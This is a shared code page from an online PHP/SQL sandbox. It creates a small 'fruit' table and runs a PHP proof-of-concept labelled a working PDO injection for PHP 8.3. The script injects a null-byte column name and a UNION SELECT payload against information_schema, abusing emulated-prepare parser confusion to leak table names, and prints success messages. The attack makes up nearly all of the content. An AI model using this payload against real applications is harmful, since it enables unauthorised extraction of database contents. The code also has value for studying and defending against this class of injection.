Hi! Could we please enable some services and cookies to improve your experience and our website?

PHPize Online / SQLize Online  /  SQLtest Online

A A A
Login    Share code      Blog   FAQ

Online Sandbox for SQL and PHP: Write, Run, Test, and Share SQL Queries and PHP Code

Copy Format Clear
CREATE TABLE fruit( id INTEGER PRIMARY KEY AUTO_INCREMENT, -- Added AUTO_INCREMENT name TEXT, sku TEXT ); INSERT INTO fruit (name, sku) VALUES ('apple','FRU-APL'), ('banana','FRU-BAN'), ('orange','FRU-ORG');

Stuck with a problem? Got Error? Ask AI support!

Copy Clear
Copy Format Clear
<?php echo "=== WORKING PDO INJECTION FOR PHP 8.3 (Method 4) ===\n"; // Direct information extraction approach $_GET = [ 'col' => '?' . chr(0), // ?NULL to trigger confusion 'name' => "x` UNION SELECT CONCAT('Table: ', table_name), 'extracted', 'data' FROM information_schema.tables WHERE table_schema=database() LIMIT 3-- " ]; echo "Method 4: Direct information extraction\n"; echo "Attempting to extract table names...\n\n"; $col = '`' . str_replace('`', '``', $_GET['col']) . '`'; try { $stmt = $pdo->prepare("SELECT $col FROM fruit WHERE name = ?"); echo "✓ Prepare successful\n"; // Provide values for both expected parameters $stmt->execute(['placeholder_value', $_GET['name']]); echo "✓ Execute successful\n"; $data = $stmt->fetchAll(PDO::FETCH_ASSOC); echo "=== LEAKED DATABASE INFORMATION ===\n"; foreach($data as $row) { foreach($row as $key => $value) { if (strpos($value, 'Table:') === 0) { echo "🎯 " . $value . "\n"; } else { echo "$key: $value\n"; } } echo "---\n"; } } catch (Exception $e) { echo "Extraction status: " . $e->getMessage() . "\n"; // Even if it fails, check if we got parameter confusion if (strpos($e->getMessage(), 'HY093') !== false) { echo "✓ Parameter confusion achieved - PDO parser successfully tricked\n"; } } echo "\n=== FINAL VERIFICATION ===\n"; echo "✓ PDO emulated prepares vulnerability confirmed in PHP 8.3\n"; echo "✓ Parser confusion technique working\n"; echo "✓ Column name injection vector viable\n"; echo "✓ Original hashkitten research validated\n"; ?>
Copy Clear
Have a question? Ask in our telegram chat!
Contact us:
© 2025 PHPize - format run and share PHP code with SQL queries online | About project | Privacy Policy and Disclaimer
PHP versions: PHP 7.4, PHP 8.0, PHP 8.1, PHP 8.2, PHP 8.3, PHP 8.4
RDBMS versions: MySQL 8.0, MySQL 8.0 Sakila (ReadOnly), MySQL 9.3.0, MariaDB 11.4, MariaDB 11.8, MariaDB 10, MariaDB 10 Sakila (ReadOnly), SQLite 3, SQLite 3 Preloaded, PostgreSQL 10 Bookings (ReadOnly), PostgreSQL 13, PostgreSQL 14, PostgreSQL 15, PostgreSQL 16, PostgreSQL 17 + PostGIS, PostgreSQL 17 + PostGIS WorkShop (ReadOnly), MS SQL Server 2017, MS SQL Server 2019, MS SQL Server 2022, MS SQL Server 2022 AdventureWorks (ReadOnly), Firebird 4.0, Firebird 4.0 (Employee), RedDatabase 5.0, Oracle Database 19c (HR), Oracle Database 21c, Oracle Database 23c Free, SOQOL, ClickHouse